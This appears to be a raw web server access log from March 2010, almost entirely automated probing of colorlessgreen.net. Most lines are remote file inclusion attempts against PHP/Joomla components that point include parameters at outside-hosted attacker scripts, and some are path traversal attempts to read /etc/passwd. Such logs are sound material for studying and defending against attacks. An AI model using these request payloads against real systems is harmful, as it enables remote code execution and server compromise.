61.63.82.14 - - [09/Mar/2010:12:13:49 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:05 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:06 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:06 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:14:22 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:16:10 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:16:12 -0800] "GET //delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:16:12 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:16:12 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:16:46 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:16:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:16:51 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:01 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:17:03 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:17:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:17:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:04 -0800] "GET /logs/access_100117.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:17:04 -0800] "GET //delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:17:04 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:17:04 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:11 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:17:46 -0800] "GET /logs/access_100226.log%20%20//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:17:53 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:18:26 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
66.102.237.18 - - [09/Mar/2010:12:18:31 -0800] "GET /logs/access_100226.log%20%20//delete_all.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:19:01 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:19:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:19:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
123.143.29.250 - - [09/Mar/2010:12:19:07 -0800] "GET /logs/access_100226.log/good.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
123.143.29.250 - - [09/Mar/2010:12:19:07 -0800] "GET /logs/good.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
123.143.29.250 - - [09/Mar/2010:12:19:07 -0800] "GET /good.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "colorlessgreen.net"
200.157.211.204 - - [09/Mar/2010:12:19:17 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:20:36 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:20:44 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
58.150.99.144 - - [09/Mar/2010:12:21:27 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
58.150.99.144 - - [09/Mar/2010:12:21:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
58.150.99.144 - - [09/Mar/2010:12:21:27 -0800] "GET /logs/access_100226.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:24:07 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:12:29:36 -0800] "GET /logs/?shop_this_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 200 938 "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:12:29:36 -0800] "GET /logs/access_100226.log%20%20/?shop_this_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:12:29:36 -0800] "GET /?shop_this_skin_path=http://sumanenter.com/id1??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "colorlessgreen.net"
118.82.114.113 - - [09/Mar/2010:12:34:30 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "colorlessgreen.net"
118.82.114.113 - - [09/Mar/2010:12:34:31 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "colorlessgreen.net"
118.82.114.113 - - [09/Mar/2010:12:34:31 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "colorlessgreen.net"
118.82.114.113 - - [09/Mar/2010:12:34:31 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "colorlessgreen.net"
76.13.123.194 - - [09/Mar/2010:12:42:02 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:45:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:45:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:45:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:46:36 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:46:36 -0800] "GET /logs/access_100226.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:46:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:46:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:46:42 -0800] "GET /logs/access_100226.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:12:46:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:50:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:50:34 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:50:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:51:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:51:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:51:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:24 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:26 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:26 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:38 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:52:38 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:54:30 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:54:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
61.63.82.14 - - [09/Mar/2010:12:54:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:02 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:10 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.14.124 - - [09/Mar/2010:12:55:10 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:14:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:14:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
165.132.30.11 - - [09/Mar/2010:13:14:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
76.13.114.106 - - [09/Mar/2010:13:14:57 -0800] "GET /blog/feed/ HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:11 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:24 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:43 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:15:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:17:03 -0800] "GET /logs/access.log//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:17:08 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:17:08 -0800] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.224.94.218 - - [09/Mar/2010:13:19:01 -0800] "GET /Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.224.94.218 - - [09/Mar/2010:13:19:01 -0800] "GET /logs/access.log/Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
67.224.94.218 - - [09/Mar/2010:13:19:01 -0800] "GET /logs/Components/errors.php?error=http://www.ykaaa.com/images/attributes/color_pirma.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:19:15 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:19:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
118.168.12.122 - - [09/Mar/2010:13:19:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:19:21 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:19:21 -0800] "GET /logs/access_100226.log//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
213.175.197.86 - - [09/Mar/2010:13:19:21 -0800] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:13:19:40 -0800] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:13:19:40 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
212.241.177.123 - - [09/Mar/2010:13:19:40 -0800] "GET /logs/access_100226.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "colorlessgreen.net"
